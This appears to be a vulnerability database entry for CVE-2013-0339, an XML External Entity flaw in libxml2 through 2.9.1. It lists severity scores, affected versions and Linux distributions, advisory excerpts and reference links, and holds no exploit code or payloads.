Published: 21/01/2014 Updated: 07/11/2023

CVSS v2 Base Score: 6.8 | Impact Score: 6.4 | Exploitability Score: 8.6

VMScore: 605

Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P

libxml2 up to and including 2.9.1 does not properly handle external entities expansion unless an application developer uses the xmlSAX2ResolveEntity or xmlSetExternalEntityLoader function, which allows remote malicious users to cause a denial of service (resource consumption), send HTTP requests to intranet servers, or read arbitrary files via a crafted XML document, aka an XML External Entity (XXE) issue. NOTE: it could be argued that because libxml2 already provides the ability to disable external entity expansion, the responsibility for resolving this issue lies with application developers; according to this argument, this entry should be REJECTed and each affected application would need its own CVE.

Vulnerable Product	Search on Vulmon	Subscribe to Product
xmlsoft libxml2 2.2.0
xmlsoft libxml2 2.2.2
xmlsoft libxml2 2.4.30
xmlsoft libxml2 2.6.16
xmlsoft libxml2 1.8.0
xmlsoft libxml2 1.8.16
xmlsoft libxml2 2.6.32
xmlsoft libxml2 2.1.0
xmlsoft libxml2 2.6.29
xmlsoft libxml2 2.4.19
xmlsoft libxml2 2.4.7
xmlsoft libxml2 2.4.17
xmlsoft libxml2 2.2.9
xmlsoft libxml2 2.8.0
xmlsoft libxml2 2.3.6
xmlsoft libxml2 2.6.26
xmlsoft libxml2 2.6.11
xmlsoft libxml2 1.7.1
xmlsoft libxml2 2.7.2
xmlsoft libxml2 2.4.21
xmlsoft libxml2 2.4.20
xmlsoft libxml2 2.3.7
xmlsoft libxml2 2.6.17
xmlsoft libxml2 2.2.4
xmlsoft libxml2 2.4.25
xmlsoft libxml2 2.4.24
xmlsoft libxml2 2.5.0
xmlsoft libxml2 2.4.6
xmlsoft libxml2 2.4.12
xmlsoft libxml2 2.3.8
xmlsoft libxml2 1.8.5
xmlsoft libxml2 2.6.27
xmlsoft libxml2 2.3.13
xmlsoft libxml2 2.3.14
xmlsoft libxml2 2.1.1
xmlsoft libxml2 2.2.6
xmlsoft libxml2 2.2.10
xmlsoft libxml2 2.4.13
xmlsoft libxml2 2.3.1
xmlsoft libxml2 2.6.13
xmlsoft libxml2 2.7.8
xmlsoft libxml2 2.7.7
xmlsoft libxml2 1.7.0
xmlsoft libxml2 2.6.7
xmlsoft libxml2 2.6.14
xmlsoft libxml2 2.4.27
xmlsoft libxml2 2.4.18
xmlsoft libxml2 2.5.7
xmlsoft libxml2 2.3.0
xmlsoft libxml2 2.4.10
xmlsoft libxml2 1.8.10
xmlsoft libxml2 2.9.0
xmlsoft libxml2 1.8.13
xmlsoft libxml2 2.4.26
xmlsoft libxml2 2.5.8
xmlsoft libxml2 2.4.28
xmlsoft libxml2 2.3.3
xmlsoft libxml2 2.2.8
xmlsoft libxml2 2.6.23
xmlsoft libxml2 2.4.9
xmlsoft libxml2 1.8.2
xmlsoft libxml2 2.4.5
xmlsoft libxml2 2.4.8
xmlsoft libxml2 1.8.9
xmlsoft libxml2 2.6.8
xmlsoft libxml2 1.7.2
xmlsoft libxml2 2.4.15
xmlsoft libxml2 2.4.11
xmlsoft libxml2 2.6.2
xmlsoft libxml2 2.2.7
xmlsoft libxml2 2.2.5
xmlsoft libxml2 2.2.3
xmlsoft libxml2 2.4.22
xmlsoft libxml2 2.6.5
xmlsoft libxml2 2.6.4
xmlsoft libxml2 2.7.5
xmlsoft libxml2 2.6.18
xmlsoft libxml2 2.4.16
xmlsoft libxml2 2.5.11
xmlsoft libxml2 2.6.24
xmlsoft libxml2 1.8.7
xmlsoft libxml2 2.3.5
xmlsoft libxml2 2.0.0
xmlsoft libxml2 2.3.10
xmlsoft libxml2 1.8.6
xmlsoft libxml2 2.4.2
xmlsoft libxml2 2.7.3
xmlsoft libxml2 2.3.4
xmlsoft libxml2 1.8.3
xmlsoft libxml2 2.6.1
xmlsoft libxml2 2.6.20
xmlsoft libxml2 2.6.31
xmlsoft libxml2 2.7.1
xmlsoft libxml2 2.2.1
xmlsoft libxml2
xmlsoft libxml2 2.7.0
xmlsoft libxml2 2.6.21
xmlsoft libxml2 2.7.6
xmlsoft libxml2 1.7.3
xmlsoft libxml2 2.3.9
xmlsoft libxml2 2.4.1
xmlsoft libxml2 2.4.23
xmlsoft libxml2 2.6.12
xmlsoft libxml2 2.6.0
xmlsoft libxml2 2.6.25
xmlsoft libxml2 2.6.9
xmlsoft libxml2 2.5.4
xmlsoft libxml2 2.6.30
xmlsoft libxml2 1.8.1
xmlsoft libxml2 2.3.11
xmlsoft libxml2 2.4.3
xmlsoft libxml2 1.8.14
xmlsoft libxml2 2.7.4
xmlsoft libxml2 1.7.4
xmlsoft libxml2 2.6.28
xmlsoft libxml2 1.8.4
xmlsoft libxml2 2.5.10
xmlsoft libxml2 2.3.12
xmlsoft libxml2 2.4.4
xmlsoft libxml2 2.4.14
xmlsoft libxml2 2.6.22
xmlsoft libxml2 2.3.2
xmlsoft libxml2 2.6.3
xmlsoft libxml2 2.2.11
xmlsoft libxml2 2.4.29
xmlsoft libxml2 2.6.6
canonical ubuntu linux 13.04
canonical ubuntu linux 12.04
debian debian linux 7.0
canonical ubuntu linux 12.10
debian debian linux 6.0
canonical ubuntu linux 10.04
suse linux enterprise server 10

Debian Bug report logs - #702260 libxml2: CVE-2013-0338 CVE-2013-0339 Package: libxml2; Maintainer for libxml2 is Debian XML/SGML Group <debian-xml-sgml-pkgs@listsaliothdebianorg>; Source for libxml2 is src:libxml2 (PTS, buildd, popcon) Reported by: Moritz Muehlenhoff <jmm@inutilorg> Date: Mon, 4 Mar 2013 15:42: ...

Several security issues were fixed in libxml2 ...

USN-1904-1 introduced a regression in libxml2 ...

Brad Hill of iSEC Partners discovered that many XML implementations are vulnerable to external entity expansion issues, which can be used for various purposes such as firewall circumvention, disguising an IP address, and denial-of-service libxml2 was susceptible to these problems when performing string substitution during entity expansion For the ...

CWE-264 https://bugzilla.redhat.com/show_bug.cgi?id=915149 http://seclists.org/oss-sec/2013/q4/182 https://git.gnome.org/browse/libxml2/commit/?id=4629ee02ac649c27f9c0cf98ba017c6b5526070f http://secunia.com/advisories/55568 http://www.openwall.com/lists/oss-security/2013/04/12/6 http://www.ubuntu.com/usn/USN-1904-1 http://secunia.com/advisories/52662 http://openwall.com/lists/oss-security/2013/02/22/3 http://secunia.com/advisories/54172 http://lists.opensuse.org/opensuse-security-announce/2013-11/msg00002.html http://www.ubuntu.com/usn/USN-1904-2 http://seclists.org/oss-sec/2013/q4/184 http://openwall.com/lists/oss-security/2013/02/21/24 http://www.debian.org/security/2013/dsa-2652 http://seclists.org/oss-sec/2013/q4/188 https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=702260 https://nvd.nist.gov https://usn.ubuntu.com/1904-1/

Get Started

CVE-2013-0339

Vulnerability Summary

Vendor Advisories

References

Vulmon Search

About

Products

Connect